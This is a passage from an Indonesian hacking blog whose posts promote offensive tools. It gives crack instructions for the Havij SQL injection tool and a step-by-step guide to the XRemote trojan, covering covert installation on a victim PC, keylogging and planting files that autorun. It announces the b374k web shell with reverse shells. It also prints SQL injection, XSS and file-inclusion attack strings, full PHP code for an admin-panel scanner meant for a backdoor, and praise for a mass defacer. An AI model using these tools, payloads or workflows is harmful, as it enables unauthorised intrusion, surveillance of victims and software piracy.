Semua ada Ilmunya

Tampilkan postingan dengan label Underground. Tampilkan semua postingan
Tampilkan postingan dengan label Underground. Tampilkan semua postingan

Havij 1.17 pro FULL

Image
Download : Here

Cara crack
[1] Install Havij 1.17 Pro.exe
[2] ekstrak file loader.exe ke folder C:\Program Files\ITSecTeam\Havij Pro
[3] Jalankan Loader.exe (akses administrator diperlukan)
[4] ketika program sudah berjalan, klik "Register” tanpa perlu menigisi nama dan file registrasi.

Fitur update

Dump all.
New bypass method for MySQL using parenthesis.
Write file feature added for MSSQL and MySQL.
Loading HTML form inputs.
Saving data in CSV format.
Advanced evasion tab in the settings.
Injection tab in settings.
Non-existent injection value’ can now be changed by *user (the default value is 999999.9).
Comment mark’ can be changed by user (the default value is –).
Disabling/enabling of logging.
Bugfix: adding manual database in tables tree view.
Bugfix: finding string columns in PostgreSQL.
Bugfix: MS Access blind string type data extraction
Bugfix: MSSQL blind auto detection when error-based method fails
Bugfix: all database blind methods fail on retry
Bugfix: guessing columns/tables in MySQL time-based injection
Bugfix: crashing when dumping into file
Bugfix: loading project injection type (Integer or String)
Bugfix: HTTPS multi-threading bug
Bugfix: command execution in MSSQL 2005

Sumber : Forum X-CODE

XRemote - PC Remoter

Image
Download Here

1.Instalasi
XRemote terdiri dari dua bagian, yaitu : XRemote.exe (Pengontrol) dan IEXPLORER.exe (Trojan). XRemote adalah bagian yang harus anda jalankan di komputer anda sedangkan IEXPLORER.exe adalah bagian yang harus anda jalankan di komputer target.

Instalasi XRemote.exe
Ekstrak semua file Client.zip ke directory komputer anda sesuai keinginan. Jalankan XRemote.exe

Instalasi IEXPLORER.exe
Ekstrak semua file Server.zip ke directory komputer target sesuai keinginan. Jalankan IEXPLORER.exe.
Server ini tidak terlihat di monitor komputer korban.

Catatan: Komputer pengontrol dan komputer target terhubung di dalam LAN (Local Area Network) yang sama ataupun didalam satu kesatuan sistem jaringan yang sama.


2.Koneksi ke komputer target
Anda perlu melakukan koneksi ke komputer korban (Saya anggap anda sudah menginstalasikan trojan ke komputer korban sudah menjalankan trojan tersebut).

Didalam sebuah Jaringan seperti LAN atau Wireless LAN memiliki beberapa komputer client dengan alamat IP yang berbeda. Alamat IP didalam sebuah jaringan umumnya adalah 192.168.0.XX atau 10.10.10.XX. Jika anda tidak mengetahui secara pasti alamat IP korban, scan terlebih dahulu di menu Xremote Server Scanner. Klik Start dan lihat daftar komputer aktif yang telah terinfeksi oleh trojan

Scanner akan menunjukkan komputer dengan alamat IP yang telah terinfeksi oleh server XRemote. Isi alamat IP korban dan klik connect untuk dapat mengontrol komputer target dari komputer anda. Jika komputer anda telah konek ke komputer target, maka anda akan melihat kata “connected” di kolom status.

3. FUNGSI DAN OPSI REMOTER
3.1 Ghost Remote
Berikut dibawah ini adalah fungsi yang dapat dikontrol pada komputer korban.
Open CD-ROM - CLOSE CD-ROM
Buka CD-ROM - Tutup CD-ROM
Hide Taskbar - Show Taskbar
Sembunyikan Taskbar – Kembalikan Taskbar yang hilang
Ram Nuker – Stop Ram Nuker
Menghabiskan resource memory RAM – menghentikan fungsi RAM Nuker
Lock The Mouse – Free The Mouse
Mengunci fungsi mouse – menghentikan penguncian mouse
Disable Click - Enable Click
Mematikan fungsi klik pada mouse – mengembalikan fungsi klik pada mouse
Shutdown PC - Reboot PC
Matikan komputer korban – Reboot komputer korban
Disable Cpanel - Enable Cpanel
Melarang fungsi Control Panel – Mengembalikan Fungsi Control Panel
Disable Run Menu - Enable Run Menu
Melarang fungsi RUN - Mengembalikan Fungsi RUN
Disable Find Menu - Enable Find Menu
Melarang fungsi FIND - Mengembalikan Fungsi FIND
Ghost Message - Close Message
Menampilkan Peringatan ke komputer korban bahwa dia telah di-remote – menutup pesan Ghost Message
Disable Regedit - Enable Regedit
Melarang fungsi REGEDIT - Mengembalikan fungsi REGEDIT
Disable TaskMan - Enable TaskMan
Melarang fungsi Task Manager - Mengembalikan fungsi Task Manager
Scr Injection - BlackEnd
Menginjeksi kalimat screen saver 3Dtext dan marquee - Menghitamkan menuWindows

3.2 Injection / Remote Execution
Injection / Remote Execution adalah menu yang menyertakan fungsi untuk memasukkan file, menjalankan program , membuat registry string dan mematikan proses pada komputer korban.

Menyusupkan file ke komputer korban
Setelah anda berhasil melakukan koneksi ke komputer korban, anda dapat mengirimkan file secara diam-diam ke komputer target. Pilih dahulu file yang terdapat di komputer anda (YOUR DRIVE) dan tentukan lokasi di komputer korban (REMOTE EXECUTION - PATH:\MYFILE.EXE) . Cth : C:\filesaya.exe .lalu klik SEND Maka anda telah mengirimkan file filesaya.exe ke komputer korban dimana lokasi virus.exe terdapat di C:\ .

Autorun file hasil susupan di komputer korban
Setelah anda tadi telah menyusupkan filesaya.exe , anda kemudian bisa menentukan apakah filesaya.exe nantinya akan dijalankan setiap kali komputer korban startup. Klik AUTORUN jika anda menginginkan filesaya.exe aktif setiap kali komputer korban dihidupkan.

Menjalankan program di komputer korban
Anda bisa menjalankan program/file music, file gambar, file text di komputer korban. Isi secara lengkap PATH:\REMOTEFILE.EXE . Cth : C:\filesaya.exe dan klik RUN ,maka filesaya.exe akan dieksekusi di komputer korban. Jika anda ingin menjalankan winamp secara remote pada komputer korban, isi kolom menjadi C:\program files\winamp\winamp.exe .

Mematikan proses di komputer korban
Anda juga dapat mematikan proses di komputer korban. Isi nama proses yang akan dimatikan di kolom REMOTEFILE.EXE lalu klik KILL misalnya, komputer korban sedang menjalankan Microsoft Word dan anda ingin menutupnya secara remote dari komputer anda. Isi dengan WINWORD.exe dan eksekusikan perintah KILL.

Membuat komputer korban membacakan teks yang anda kirimkan
Membuat komputer korban berbicara sesuka hati anda merupakan salah satu fungsi tambahan yang dimiliki oleh XRemote. Cukup ketikkan kata-kata di kolom dan klik tombol GODSPEAK. Maka komputer korban akan menjadi sebuah mesin yang cerewet.

3.3 Keylogger
Seperti namanya, Key = kunci (tombol yang dapat anda ketik di keyboard) dan logger = pencatat/perekam. Keylogger dapat diartikan “Kemampuan sebuah program untuk merekam setiap aktifitas yang dilakukan user diatas keyboard”.

Ketika server trojan XRemote aktif, fungsi keylogger tidak difungsikan pada komoyter korban. Anda dapat mengaktifkan ataupun mematikan keylogger sesuai kehendak. Klik : START KEYLOGGER dan biarkan korban beraktifitas beberapa saat. Jika anda ingin melihat apa yang telah diketik oleh korban Klik GET LOG FILE, maka trojan akan
mengirimkan catatan keylogger ke komputer anda. Klik CLEAR untuk membersihkan log file dan STOP KEYLOGGER untuk menonaktifkan fungsi keylogger.

Aktifitas yang akan dicatat oleh Trojan adalah sebagai berikut :
Aplikasi yang dijalankan korban
Karakter yang diketik dengan keyboard oleh korban

Video

Sumber : Forum X-CODE

Official b374k shell 2.3

[Image: ThfFjo9.jpg]
  • Versi ini dilengkapi dengan anti search engine bot, jadi gak akan di crawl oleh googlebot dan bot bot lainnya, silahkan modifikasi source code nya untuk menambahkan list bot yang mau di block
  • Eval sekarng bukan hanya bisa php, tapi juga bisa untuk jalanin script python, perl, ruby, c, java
  • Semua Bind dan Reverse shell di update, dan ditambahin bind connect untuk php, dan bind+reverse shell pakai ruby script
  • Connect ke mysql server pakai driver sqlsrv, dimana sebelumnya menggunakan driver mssql
  • Connect ke database sqlite/sqlite3
  • Menu phpinfo diganti dengan info yg berisi info2 umum tentang server
  • Support PHP4
  • API Support
  • several bugs fixed
Untuk API Support baca disini:
Dengan adanya API ini, maka kamu bisa control shell ini dari jauh, bisa kamu buat program untuk kelola semua shell-shell kamu
Bisa untuk update sekaligus semua shell, dan banyak lagi, dll

Download di

Sumber > Forum devilzc0de

[Indonesian] Protecting Website from Common Attacks


[Indonesian] Protecting Website from Common Attacks

------------------------------------------------------/
[-] Title : Protecting website from common attacks
[-] Date : 08-08-2010
[-] Author : vYc0d
[-] Contact : vyc0d@hackermail.com
[-] Web : http://vyc0d.blogspot.com
[-] Language : Indonesian
------------------------------------------------------/

Konten :
[1] Pendahuluan
[2] Cross Site Scripting
[3] SQL Injection
\_ Login Form Bypassing
\_ UNION SQL Injection
[3] File Inclusion
[4] Special Thanks

[1] Pendahuluan

Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.



[2] Cross Site Scripting

Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.

Example:
http://www.situs.net/find.php?all=">

*Solusi (javascript) :

function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}



[3] SQL Injection

*\_ Login Form Bypassing

Berikut adalah contoh kode yang dapat kita bisa bypass:

index.html file:
<form action="login.php" method="POST" />
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// Contoh Kode
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>

Kita dapat bypass dengan menggunakan ' or '1=1', dan menjalankan "password = ''or '1=1'';".
Atau attacker dapat juga dapat menghapus database dengan menjalankan "' drop table database; --".

*Solusi :

Menggunakan mysql_real_escape_string

Contoh:
<?php
$badcode = "' OR 1 '";
$badcode = mysql_real_escape_string($badcode);
$message = "SELECT * from database WHERE password = "'$badcode'";
echo "what are doing nobs" . $message . ";
?>


*\_ Union SQL Injection

Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url "sebuah php?.id=". Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

Contoh :
http://www.situs.net/index.php?id=1'
salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in.....

Setelah muncul pesan error,maka attacker melanjutkan aksinya ;))
http://www.situs.net/index.php?id=1 ORDER BY 1-- <-- No error.
http://www.situs.net/index.php?id=1 ORDER BY 2-- <-- Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()-- <-- Memilih semua kolom dan menjalankan
perintah version().

*Solusi :

Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);



[4] File Inclusion

\_ Remote File Inclusion dan Local File Inclusion

Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.

Contoh kode yang vulnerable :
<?php
include($_GET['page']);
?>

Beberapa contoh serangan :
http://www.situs.net/page.php?page=../.....etc/passwd < contoh LFI
http://www.situs.net/page.php?page=http:...cript.txt? < contoh RFI

*Solusi :

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}



[4] Special Thanks

[-] Allah SWT, Muhammad SAW
[-] The big Family of :
[-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew
[-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie
[-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)


Source:http://www.exploit-db.com/papers/14577/

Webshop for Order

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Simple Admin Scanner PHP


Pertama Buat Newfile di backdoor atau webhosting kalian sendiri

Terus Buat Directory dengan nama finder

dan buat file index.html dengan code berikut

<html>
<title>Php My Admin Finder Recoded By Brian Kamikaze [SBH]</title>
<body>
<form action ="finder.php" method="post">
URL to site: <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>
</body>
</html>
//TbH Team
// Turk Black Hat
// skote_vahshat
// SurabayaBlackhat
// Java Defacer Team
// Sempr00t Hacking Team
Kemudian Save

Lanjutkan dengan Membuat File dengan nama finder.php dengan code berikut
<?php
$site = $_POST['site'];
$list = array(
'/admin/',
'/login/',
'/admin1.php/',
'/admin.php/',
'/admin.html/',
'/admin1.php/',
'/admin1.html/',
'/login.php/',
'/admin/cp.php/',
'/cp.php/',
'/administrator/index.php/',
'/administrator/index.html/',
'/administartor/',
'/admin.login/',
'/administrator/login.php/',
'/administrator/login.html/',
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
);
if(isset($site)){
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else {
echo "<br /> [-] Nothing found on [$site$test]";
}
}
}
?> 
Kemudian save..
jadi deh..

source : devilzc0de.org/forum 

5,000+ sites hacked in 2 days by Indonesian Top Hacker Hmei7


Top Hacker Indonesia  bernama "Hmei7, yang dikenal sebagai  Mass defacements , telahmengklaim telah merusak lebih dari 5000 website dalam dua hari (31 Desember 2012 dan 1 Jan 2013).

Sejauh ini, ia meng-hack banyak situs profil tinggi, termasuk IBM, Microsoft,SIEMENS, AVG,Foxconn. Dia juga dirusak ribuan website Pemerintah milik negara yang berbeda.

Hacker bukanlah orang yang suka mendeface halaman utama situs. Dia hanya meng-uploadsebuah file bernama "x.txt" atau "x.html" pada website.
Sumber : codenesia.com